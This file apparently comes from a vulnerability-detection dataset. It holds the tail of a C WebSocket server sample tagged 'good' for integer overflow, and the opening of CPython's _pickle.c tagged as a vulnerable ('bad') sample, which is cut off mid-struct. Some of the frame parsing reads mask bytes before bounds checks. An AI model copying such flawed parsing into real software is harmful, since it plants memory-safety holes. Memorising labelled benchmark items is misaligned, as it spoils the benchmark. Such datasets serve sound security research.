if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
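/* Opcodes accepted by is_good_opcode() below, per RFC 6455 section 5.2:
0x0 continuation, 0x1 text, 0x2 binary, 0x8 close, 0x9 ping, 0xa pong. */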
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
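/* For reference, the client-to-server frame layout parsed above
(RFC 6455, section 5.2):
byte 0: FIN (bit 7) | RSV (bits 6-4) | opcode (bits 3-0)
byte 1: MASK (bit 7) | payload length (bits 6-0)
length == 126: 2 extra bytes, big-endian 16-bit payload length
length == 127: 8 extra bytes, big-endian 64-bit payload length
then a 4-byte masking key, then the masked payload, unmasked above
as payload[i] ^= key[i & 3]. */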
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
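/* Server-to-client frames built by send_reply() are intentionally unmasked:
RFC 6455 requires masking only in the client-to-server direction.
ws_send_text() / ws_send_binary() below wrap it with the text (0x1) and
binary (0x2) opcodes, and send_pong_message() with pong (0xa). */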
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
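/* on_recv_pkg() accumulates fragmented messages: data-frame payloads are
appended to info->message and the user callback fires only once a frame
with the FIN bit set arrives; control frames (close/ping/pong) are handled
before any accumulation takes place. */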
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_402_3 |
crossvul-cpp_data_bad_496_0 |
/* Core extension modules are built-in on some platforms (e.g. Windows). */
#ifdef Py_BUILD_CORE
#define Py_BUILD_CORE_BUILTIN
#undef Py_BUILD_CORE
#endif
#include "Python.h"
#include "structmember.h"
PyDoc_STRVAR(pickle_module_doc,
"Optimized C implementation for the Python pickle module.");
/*[clinic input]
module _pickle
class _pickle.Pickler "PicklerObject *" "&Pickler_Type"
class _pickle.PicklerMemoProxy "PicklerMemoProxyObject *" "&PicklerMemoProxyType"
class _pickle.Unpickler "UnpicklerObject *" "&Unpickler_Type"
class _pickle.UnpicklerMemoProxy "UnpicklerMemoProxyObject *" "&UnpicklerMemoProxyType"
[clinic start generated code]*/
/*[clinic end generated code: output=da39a3ee5e6b4b0d input=4b3e113468a58e6c]*/
/* Bump HIGHEST_PROTOCOL when new opcodes are added to the pickle protocol.
Bump DEFAULT_PROTOCOL only when the oldest still supported version of Python
already includes it. */
enum {
HIGHEST_PROTOCOL = 4,
DEFAULT_PROTOCOL = 4
};
/* Pickle opcodes. These must be kept updated with pickle.py.
Extensive docs are in pickletools.py. */
enum opcode {
MARK = '(',
STOP = '.',
POP = '0',
POP_MARK = '1',
DUP = '2',
FLOAT = 'F',
INT = 'I',
BININT = 'J',
BININT1 = 'K',
LONG = 'L',
BININT2 = 'M',
NONE = 'N',
PERSID = 'P',
BINPERSID = 'Q',
REDUCE = 'R',
STRING = 'S',
BINSTRING = 'T',
SHORT_BINSTRING = 'U',
UNICODE = 'V',
BINUNICODE = 'X',
APPEND = 'a',
BUILD = 'b',
GLOBAL = 'c',
DICT = 'd',
EMPTY_DICT = '}',
APPENDS = 'e',
GET = 'g',
BINGET = 'h',
INST = 'i',
LONG_BINGET = 'j',
LIST = 'l',
EMPTY_LIST = ']',
OBJ = 'o',
PUT = 'p',
BINPUT = 'q',
LONG_BINPUT = 'r',
SETITEM = 's',
TUPLE = 't',
EMPTY_TUPLE = ')',
SETITEMS = 'u',
BINFLOAT = 'G',
/* Protocol 2. */
PROTO = '\x80',
NEWOBJ = '\x81',
EXT1 = '\x82',
EXT2 = '\x83',
EXT4 = '\x84',
TUPLE1 = '\x85',
TUPLE2 = '\x86',
TUPLE3 = '\x87',
NEWTRUE = '\x88',
NEWFALSE = '\x89',
LONG1 = '\x8a',
LONG4 = '\x8b',
/* Protocol 3 (Python 3.x) */
BINBYTES = 'B',
SHORT_BINBYTES = 'C',
/* Protocol 4 */
SHORT_BINUNICODE = '\x8c',
BINUNICODE8 = '\x8d',
BINBYTES8 = '\x8e',
EMPTY_SET = '\x8f',
ADDITEMS = '\x90',
FROZENSET = '\x91',
NEWOBJ_EX = '\x92',
STACK_GLOBAL = '\x93',
MEMOIZE = '\x94',
FRAME = '\x95'
};
enum {
/* Keep in synch with pickle.Pickler._BATCHSIZE. This is how many elements
batch_list/dict() pumps out before doing APPENDS/SETITEMS. Nothing will
break if this gets out of synch with pickle.py, but it's unclear that would
help anything either. */
BATCHSIZE = 1000,
/* Nesting limit until Pickler, when running in "fast mode", starts
checking for self-referential data-structures. */
FAST_NESTING_LIMIT = 50,
/* Initial size of the write buffer of Pickler. */
WRITE_BUF_SIZE = 4096,
/* Prefetch size when unpickling (disabled on unpeekable streams) */
PREFETCH = 8192 * 16,
FRAME_SIZE_MIN = 4,
FRAME_SIZE_TARGET = 64 * 1024,
FRAME_HEADER_SIZE = 9
};
/*************************************************************************/
/* State of the pickle module, per PEP 3121. */
typedef struct {
/* Exception classes for pickle. */
PyObject *PickleError;
PyObject *PicklingError;
PyObject *UnpicklingError;
/* copyreg.dispatch_table, {type_object: pickling_function} */
PyObject *dispatch_table;
/* For the extension opcodes EXT1, EXT2 and EXT4. */
/* copyreg._extension_registry, {(module_name, function_name): code} */
PyObject *extension_registry;
/* copyreg._extension_cache, {code: object} */
PyObject *extension_cache;
/* copyreg._inverted_registry, {code: (module_name, function_name)} */
PyObject *inverted_registry;
/* Import mappings for compatibility with Python 2.x */
/* _compat_pickle.NAME_MAPPING,
{(oldmodule, oldname): (newmodule, newname)} */
PyObject *name_mapping_2to3;
/* _compat_pickle.IMPORT_MAPPING, {oldmodule: newmodule} */
PyObject *import_mapping_2to3;
/* Same, but with REVERSE_NAME_MAPPING / REVERSE_IMPORT_MAPPING */
PyObject *name_mapping_3to2;
PyObject *import_mapping_3to2;
/* codecs.encode, used for saving bytes in older protocols */
PyObject *codecs_encode;
/* builtins.getattr, used for saving nested names with protocol < 4 */
PyObject *getattr;
/* functools.partial, used for implementing __newobj_ex__ with protocols
2 and 3 */
PyObject *partial;
} PickleState;
/* Forward declaration of the _pickle module definition. */
static struct PyModuleDef _picklemodule;
/* Given a module object, get its per-module state. */
static PickleState *
_Pickle_GetState(PyObject *module)
{
return (PickleState *)PyModule_GetState(module);
}
/* Find the module instance imported in the currently running sub-interpreter
and get its state. */
static PickleState *
_Pickle_GetGlobalState(void)
{
return _Pickle_GetState(PyState_FindModule(&_picklemodule));
}
/* Clear the given pickle module state. */
static void
_Pickle_ClearState(PickleState *st)
{
Py_CLEAR(st->PickleError);
Py_CLEAR(st->PicklingError);
Py_CLEAR(st->UnpicklingError);
Py_CLEAR(st->dispatch_table);
Py_CLEAR(st->extension_registry);
Py_CLEAR(st->extension_cache);
Py_CLEAR(st->inverted_registry);
Py_CLEAR(st->name_mapping_2to3);
Py_CLEAR(st->import_mapping_2to3);
Py_CLEAR(st->name_mapping_3to2);
Py_CLEAR(st->import_mapping_3to2);
Py_CLEAR(st->codecs_encode);
Py_CLEAR(st->getattr);
Py_CLEAR(st->partial);
}
/* Initialize the given pickle module state. */
static int
_Pickle_InitState(PickleState *st)
{
PyObject *builtins;
PyObject *copyreg = NULL;
PyObject *compat_pickle = NULL;
PyObject *codecs = NULL;
PyObject *functools = NULL;
builtins = PyEval_GetBuiltins();
if (builtins == NULL)
goto error;
st->getattr = PyDict_GetItemString(builtins, "getattr");
if (st->getattr == NULL)
goto error;
Py_INCREF(st->getattr);
copyreg = PyImport_ImportModule("copyreg");
if (!copyreg)
goto error;
st->dispatch_table = PyObject_GetAttrString(copyreg, "dispatch_table");
if (!st->dispatch_table)
goto error;
if (!PyDict_CheckExact(st->dispatch_table)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg.dispatch_table should be a dict, not %.200s",
Py_TYPE(st->dispatch_table)->tp_name);
goto error;
}
st->extension_registry = \
PyObject_GetAttrString(copyreg, "_extension_registry");
if (!st->extension_registry)
goto error;
if (!PyDict_CheckExact(st->extension_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_registry should be a dict, "
"not %.200s", Py_TYPE(st->extension_registry)->tp_name);
goto error;
}
st->inverted_registry = \
PyObject_GetAttrString(copyreg, "_inverted_registry");
if (!st->inverted_registry)
goto error;
if (!PyDict_CheckExact(st->inverted_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._inverted_registry should be a dict, "
"not %.200s", Py_TYPE(st->inverted_registry)->tp_name);
goto error;
}
st->extension_cache = PyObject_GetAttrString(copyreg, "_extension_cache");
if (!st->extension_cache)
goto error;
if (!PyDict_CheckExact(st->extension_cache)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_cache should be a dict, "
"not %.200s", Py_TYPE(st->extension_cache)->tp_name);
goto error;
}
Py_CLEAR(copyreg);
/* Load the 2.x -> 3.x stdlib module mapping tables */
compat_pickle = PyImport_ImportModule("_compat_pickle");
if (!compat_pickle)
goto error;
st->name_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "NAME_MAPPING");
if (!st->name_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->name_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING should be a dict, not %.200s",
Py_TYPE(st->name_mapping_2to3)->tp_name);
goto error;
}
st->import_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "IMPORT_MAPPING");
if (!st->import_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->import_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_2to3)->tp_name);
goto error;
}
/* ... and the 3.x -> 2.x mapping tables */
st->name_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_NAME_MAPPING");
if (!st->name_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->name_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->name_mapping_3to2)->tp_name);
goto error;
}
st->import_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_IMPORT_MAPPING");
if (!st->import_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->import_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_3to2)->tp_name);
goto error;
}
Py_CLEAR(compat_pickle);
codecs = PyImport_ImportModule("codecs");
if (codecs == NULL)
goto error;
st->codecs_encode = PyObject_GetAttrString(codecs, "encode");
if (st->codecs_encode == NULL) {
goto error;
}
if (!PyCallable_Check(st->codecs_encode)) {
PyErr_Format(PyExc_RuntimeError,
"codecs.encode should be a callable, not %.200s",
Py_TYPE(st->codecs_encode)->tp_name);
goto error;
}
Py_CLEAR(codecs);
functools = PyImport_ImportModule("functools");
if (!functools)
goto error;
st->partial = PyObject_GetAttrString(functools, "partial");
if (!st->partial)
goto error;
Py_CLEAR(functools);
return 0;
error:
Py_CLEAR(copyreg);
Py_CLEAR(compat_pickle);
Py_CLEAR(codecs);
Py_CLEAR(functools);
_Pickle_ClearState(st);
return -1;
}
/* Helper for calling a function with a single argument quickly.
This function steals the reference of the given argument. */
static PyObject *
_Pickle_FastCall(PyObject *func, PyObject *obj)
{
PyObject *result;
result = PyObject_CallFunctionObjArgs(func, obj, NULL);
Py_DECREF(obj);
return result;
}
/*************************************************************************/
/* Retrieve and deconstruct a method for avoiding a reference cycle
(pickler -> bound method of pickler -> pickler) */
static int
init_method_ref(PyObject *self, _Py_Identifier *name,
PyObject **method_func, PyObject **method_self)
{
PyObject *func, *func2;
int ret;
/* *method_func and *method_self should be consistent. All refcount decrements
should occur after setting *method_self and *method_func. */
ret = _PyObject_LookupAttrId(self, name, &func);
if (func == NULL) {
*method_self = NULL;
Py_CLEAR(*method_func);
return ret;
}
if (PyMethod_Check(func) && PyMethod_GET_SELF(func) == self) {
/* Deconstruct a bound Python method */
func2 = PyMethod_GET_FUNCTION(func);
Py_INCREF(func2);
*method_self = self; /* borrowed */
Py_XSETREF(*method_func, func2);
Py_DECREF(func);
return 0;
}
else {
*method_self = NULL;
Py_XSETREF(*method_func, func);
return 0;
}
}
/* Bind a method if it was deconstructed */
static PyObject *
reconstruct_method(PyObject *func, PyObject *self)
{
if (self) {
return PyMethod_New(func, self);
}
else {
Py_INCREF(func);
return func;
}
}
static PyObject *
call_method(PyObject *func, PyObject *self, PyObject *obj)
{
if (self) {
return PyObject_CallFunctionObjArgs(func, self, obj, NULL);
}
else {
return PyObject_CallFunctionObjArgs(func, obj, NULL);
}
}
/*************************************************************************/
/* Internal data type used as the unpickling stack. */
typedef struct {
PyObject_VAR_HEAD
PyObject **data;
int mark_set; /* is MARK set? */
Py_ssize_t fence; /* position of top MARK or 0 */
Py_ssize_t allocated; /* number of slots in data allocated */
} Pdata;
static void
Pdata_dealloc(Pdata *self)
{
Py_ssize_t i = Py_SIZE(self);
while (--i >= 0) {
Py_DECREF(self->data[i]);
}
PyMem_FREE(self->data);
PyObject_Del(self);
}
static PyTypeObject Pdata_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pdata", /*tp_name*/
sizeof(Pdata), /*tp_basicsize*/
sizeof(PyObject *), /*tp_itemsize*/
(destructor)Pdata_dealloc, /*tp_dealloc*/
};
static PyObject *
Pdata_New(void)
{
Pdata *self;
if (!(self = PyObject_New(Pdata, &Pdata_Type)))
return NULL;
Py_SIZE(self) = 0;
self->mark_set = 0;
self->fence = 0;
self->allocated = 8;
self->data = PyMem_MALLOC(self->allocated * sizeof(PyObject *));
if (self->data)
return (PyObject *)self;
Py_DECREF(self);
return PyErr_NoMemory();
}
/* Retain only the initial clearto items. If clearto >= the current
* number of items, this is a (non-erroneous) NOP.
*/
static int
Pdata_clear(Pdata *self, Py_ssize_t clearto)
{
Py_ssize_t i = Py_SIZE(self);
assert(clearto >= self->fence);
if (clearto >= i)
return 0;
while (--i >= clearto) {
Py_CLEAR(self->data[i]);
}
Py_SIZE(self) = clearto;
return 0;
}
static int
Pdata_grow(Pdata *self)
{
PyObject **data = self->data;
size_t allocated = (size_t)self->allocated;
size_t new_allocated;
new_allocated = (allocated >> 3) + 6;
/* check for integer overflow */
if (new_allocated > (size_t)PY_SSIZE_T_MAX - allocated)
goto nomemory;
new_allocated += allocated;
PyMem_RESIZE(data, PyObject *, new_allocated);
if (data == NULL)
goto nomemory;
self->data = data;
self->allocated = (Py_ssize_t)new_allocated;
return 0;
nomemory:
PyErr_NoMemory();
return -1;
}
static int
Pdata_stack_underflow(Pdata *self)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
self->mark_set ?
"unexpected MARK found" :
"unpickling stack underflow");
return -1;
}
/* D is a Pdata*. Pop the topmost element and store it into V, which
* must be an lvalue holding PyObject*. On stack underflow, UnpicklingError
* is raised and V is set to NULL.
*/
static PyObject *
Pdata_pop(Pdata *self)
{
if (Py_SIZE(self) <= self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
return self->data[--Py_SIZE(self)];
}
#define PDATA_POP(D, V) do { (V) = Pdata_pop((D)); } while (0)
static int
Pdata_push(Pdata *self, PyObject *obj)
{
if (Py_SIZE(self) == self->allocated && Pdata_grow(self) < 0) {
return -1;
}
self->data[Py_SIZE(self)++] = obj;
return 0;
}
/* Push an object on stack, transferring its ownership to the stack. */
#define PDATA_PUSH(D, O, ER) do { \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
/* Push an object on stack, adding a new reference to the object. */
#define PDATA_APPEND(D, O, ER) do { \
Py_INCREF((O)); \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
static PyObject *
Pdata_poptuple(Pdata *self, Py_ssize_t start)
{
PyObject *tuple;
Py_ssize_t len, i, j;
if (start < self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
len = Py_SIZE(self) - start;
tuple = PyTuple_New(len);
if (tuple == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyTuple_SET_ITEM(tuple, j, self->data[i]);
Py_SIZE(self) = start;
return tuple;
}
static PyObject *
Pdata_poplist(Pdata *self, Py_ssize_t start)
{
PyObject *list;
Py_ssize_t len, i, j;
len = Py_SIZE(self) - start;
list = PyList_New(len);
if (list == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyList_SET_ITEM(list, j, self->data[i]);
Py_SIZE(self) = start;
return list;
}
typedef struct {
PyObject *me_key;
Py_ssize_t me_value;
} PyMemoEntry;
typedef struct {
Py_ssize_t mt_mask;
Py_ssize_t mt_used;
Py_ssize_t mt_allocated;
PyMemoEntry *mt_table;
} PyMemoTable;
typedef struct PicklerObject {
PyObject_HEAD
PyMemoTable *memo; /* Memo table, keep track of the seen
objects to support self-referential objects
pickling. */
PyObject *pers_func; /* persistent_id() method, can be NULL */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
PyObject *dispatch_table; /* private dispatch_table, can be NULL */
PyObject *write; /* write() method of the output stream. */
PyObject *output_buffer; /* Write into a local bytearray buffer before
flushing to the stream. */
Py_ssize_t output_len; /* Length of output_buffer. */
Py_ssize_t max_output_len; /* Allocation size of output_buffer. */
int proto; /* Pickle protocol number, >= 0 */
int bin; /* Boolean, true if proto > 0 */
int framing; /* True when framing is enabled, proto >= 4 */
Py_ssize_t frame_start; /* Position in output_buffer where the
current frame begins. -1 if there
is no frame currently open. */
Py_ssize_t buf_size; /* Size of the current buffered pickle data */
int fast; /* Enable fast mode if set to a true value.
Fast mode disables the use of the memo,
speeding up the pickling process by not
generating superfluous PUT opcodes. It
should not be used with self-referential
objects. */
int fast_nesting;
int fix_imports; /* Indicate whether Pickler should fix
the name of globals for Python 2.x. */
PyObject *fast_memo;
} PicklerObject;
typedef struct UnpicklerObject {
PyObject_HEAD
Pdata *stack; /* Pickle data stack, store unpickled objects. */
/* The unpickler memo is just an array of PyObject *s. Using a dict
is unnecessary, since the keys are contiguous ints. */
PyObject **memo;
Py_ssize_t memo_size; /* Capacity of the memo array */
Py_ssize_t memo_len; /* Number of objects in the memo */
PyObject *pers_func; /* persistent_load() method, can be NULL. */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
Py_buffer buffer;
char *input_buffer;
char *input_line;
Py_ssize_t input_len;
Py_ssize_t next_read_idx;
Py_ssize_t prefetched_idx; /* index of first prefetched byte */
PyObject *read; /* read() method of the input stream. */
PyObject *readline; /* readline() method of the input stream. */
PyObject *peek; /* peek() method of the input stream, or NULL */
char *encoding; /* Name of the encoding to be used for
decoding strings pickled using Python
2.x. The default value is "ASCII" */
char *errors; /* Name of the error handling scheme used when
decoding strings. The default value is
"strict". */
Py_ssize_t *marks; /* Mark stack, used for unpickling container
objects. */
Py_ssize_t num_marks; /* Number of marks in the mark stack. */
Py_ssize_t marks_size; /* Current allocated size of the mark stack. */
int proto; /* Protocol of the pickle loaded. */
